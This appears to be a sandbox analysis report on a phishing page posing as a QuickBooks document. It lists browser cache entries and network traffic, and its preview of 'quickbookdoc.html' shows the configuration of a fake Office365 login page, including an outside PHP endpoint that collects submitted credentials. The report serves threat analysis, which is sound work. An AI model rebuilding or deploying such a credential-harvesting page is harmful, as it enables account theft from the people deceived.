Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (19156), with CRLF line terminators
Category:	downloaded
Size (bytes):	19428
Entropy (8bit):	5.393711740543031
Encrypted:	false
SSDEEP:	384:D17i76pyKJ7eFJ7ecR7ec47Dd7747R7RqytPhgTwZe08B7W7L7m7J7L7GqGs+7sn:x2OFCDCcRCcQNEldtOi1KCXStXygTT
MD5:	591B7B06C558ECC6629DCFA8F76D4133
SHA1:	68F9A476C587E3637614657C0467EDDE71B20DA5
SHA-256:	FFD56A767D9987EE093D6051C28DDD690A7C9A119AE56C50FC26DDE7F757C24F
SHA-512:	544B328DC18FA5B58B12F6673FB766C4CD2019B59EF101C6FCC93360C134D01D240FAFFA2E77D0A08B9A1AE3966AB4947D5FBAF308DEE1BF501A087B4BE2E08A
Malicious:	false
Reputation:	low
URL:	https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html
Preview:	<!DOCTYPE HTML><html><head>.. <script>.. let main_email_to = "";.. let redirect_link = "https://login.microsoft.com/".. let Script_link= "https://abordares.com/quicky/df.php";.. let result_provider = "Microsoft Outlook";.. </script>...<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><title>Sign in to your Office365 account</title><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2.0,minimum-scale=1,user-scalable=yes"><link rel="shortcut icon" href="https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico"><link rel="stylesheet" title="Converged_v2" type="text/css" href="https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css"><style type="text/css">.footer{left:0;right:0}.hme{display:none!important}@media screen and(max-width:768px){.footer{left:0;right:0;bottom:0!important;pos

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89493
Entropy (8bit):	5.289599913770796
Encrypted:	false
SSDEEP:	1536:YjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h5cApwEjOPrBeU6QLiTFbc0QlQvakF:YYh8eip3hXuf6IidlrvakdtQ47GK1
MD5:	12108007906290015100837A6A61E9F4
SHA1:	1D6AE46F2FFA213DEDE37A521B011EC1CD8D1AD3
SHA-256:	C4DCCDD9AE25B64078E0C73F273DE94F8894D5C99E4741645ECE29AEEFC9C5A4
SHA-512:	93658F3EB4A044523A7136871E125D73C9005DA44CE09045103A35A4F18695888ECAFE2F9C0D0FA741B95CC618C6000F9AD9AFFC821A400EA7E5F2C0C8968530
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js
Preview:	/! jQuery v3.5.0 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.164497779200461
Encrypted:	false
SSDEEP:	3:6ATunSkks:uSBs
MD5:	17C4BD96DCB397D1D62D24921BC4FEBA
SHA1:	2C0F2AFF858069D582A97867B183EBD5DC8A9FCB
SHA-256:	3549DBC06BDD994A38C9A29AECD7E8F9577E2150D15F8D6B0533B4D250666514
SHA-512:	9659C4D5B7EF0C852428D3AE8A8EE816438E268E4537FFA70823C9CB2C240252E6D9E863B2AE95F39397172EEFAAA73541123DC9255C9B37FC9437C655F55A78
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlLKqGoWEhNORIFDU9-u70SBQ1Xevf9?alt=proto
Preview:	ChIKBw1Pfru9GgAKBw1Xevf9GgA=

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	240
Entropy (8bit):	6.583238701216054
Encrypted:	false
SSDEEP:	6:6v/lhPZJkta+R80rWRNtlQQz6fl4sfiadl/jp:6v/77t5NJIlhfL/N
MD5:	7CC096DA6AA2DBA3F81FCC1C8262157C
SHA1:	A50776316F0220ED7CD7882A68C742A8861C999D
SHA-256:	AB50358475ADAE73A435466C72D1A48AB124E8AE06614663716A46DCE5AC8B83
SHA-512:	EC046758EC2D6588B9B103E5BB1B035DEE57DFBB068AD902C869ED22B14F78282461709BDB20366EE887B814F00AE39A4EBD82DB42BD831BE85FE5B4BF4037AF
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............w=.....pHYs...........~.....IDATH....@.......: !D.%.@%..>(...4@FHND.Gj.l.'.I ....h?.&.D.......$...R.z.....`.........#...a..8@3.z.=...3X...X.L.;....v`.....p.t..DI&w.I.pA&9..F........Z.FG<&.:9.....IEND.B`.

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 01:37:31.382010937 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:31.382025957 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:31.491414070 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:38.166179895 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.166260004 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.167288065 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.167325974 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.167330027 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.167397022 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.167632103 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.167669058 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.167752028 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.167773962 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.390423059 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.390733004 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.390789986 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.391773939 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.391844034 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.392246008 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.393439054 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.393495083 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.393716097 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.393799067 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.394006014 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.394021988 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.394942999 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.395034075 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.395319939 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.395411015 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.436929941 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.436989069 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:38.487544060 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:38.523386955 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.062932968 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.062977076 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063035965 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063066959 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063066959 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063102007 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063116074 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063134909 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063225031 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063246965 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063262939 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063271999 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063312054 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063739061 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063791037 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063817024 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063842058 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063857079 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063898087 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.063910007 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.063992977 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.064035892 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.130511045 CEST	49710	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:39.130568981 CEST	443	49710	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:39.261672020 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.261687994 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.261749983 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.261945963 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.261950970 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.261997938 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.262406111 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.262484074 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.262547016 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.262873888 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.262911081 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.262974024 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.263263941 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.263277054 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.263736010 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.263751030 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.263955116 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.263989925 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.264241934 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.264280081 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.274779081 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.274863958 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.274936914 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.275486946 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.275521994 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.479250908 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.479517937 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.479527950 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.480227947 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.480420113 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.480427027 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.480520964 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.480581999 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.481307983 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.481368065 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.482362986 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.482422113 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.482659101 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.482731104 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.482817888 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.482825994 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.483071089 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.483077049 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.484127045 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.484395027 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.484453917 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.485892057 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.485979080 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.487077951 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.487170935 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.487385988 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.487405062 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.491462946 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.491666079 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.491714001 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.493511915 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.493587017 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.493984938 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.494157076 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.494188070 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.497167110 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.497328997 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.497359037 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.498745918 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.498814106 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.499787092 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.499910116 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.499979973 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.499995947 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.535109043 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.535109043 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.535368919 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.535389900 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.535451889 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.550673962 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.579262018 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.684042931 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684134960 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684173107 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684190989 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.684206009 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684238911 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684242010 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.684256077 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.684303999 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.686244965 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.686567068 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.686640978 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.687087059 CEST	49714	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.687096119 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.687103987 CEST	443	49714	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.690530062 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.690556049 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.690591097 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.690599918 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.690656900 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.693972111 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.697444916 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.697494030 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.697501898 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.700998068 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.701047897 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.701055050 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.702389002 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.702534914 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.702611923 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.704350948 CEST	49713	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.704376936 CEST	443	49713	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.704386950 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.704444885 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.704452038 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.707878113 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.707920074 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.707926989 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.711334944 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.711393118 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.711400986 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.718298912 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.718354940 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.718360901 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.721736908 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.721801043 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.721807957 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.725172997 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.725230932 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.725238085 CEST	443	49712	199.36.158.100	192.168.2.5
